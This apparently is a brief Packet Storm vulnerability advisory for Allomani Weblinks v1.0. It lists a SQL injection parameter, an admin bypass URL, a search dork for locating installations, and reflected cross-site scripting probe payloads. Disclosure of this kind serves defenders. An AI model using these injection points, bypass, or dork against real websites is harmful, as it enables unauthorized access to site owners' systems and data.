Allomani Weblinks version 1.0 suffers from cross site scripting and remote SQL injection vulnerabilities.
8d9f3e71b978b9ec650a22fdd15b5b15600a0dd9446838f94f104b8c5f1fa6c1Allomani Weblinks v1.0 Multi Vulnerability
=====================================
Author : indoushka
Vondor : https://www.allomani.com/
Dork : جميع الحقوق محفوظة لـ : اللوماني © 2014
برمجة اللوماني للخدمات البرمجية © 2006
======================================
Sql injection :
https://127.0.0.1/public_html/index.php?action=browse&cat=1 (inject her)
cpanel : https://127.0.0.1/public_html/admin.php
By Pass :
https://127.0.0.1/public_html/admin_menu.html
Cross site scripting (verified) :
Affected items
/public_html/admin.php
/public_html/go.php
URI was set to "onmouseover='prompt(929220)'bad=">
The input is reflected inside a tag parameter between double quotes.
URL encoded GET input id was set to 12'"()&%<ScRiPt >prompt(983476)</ScRiPt>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed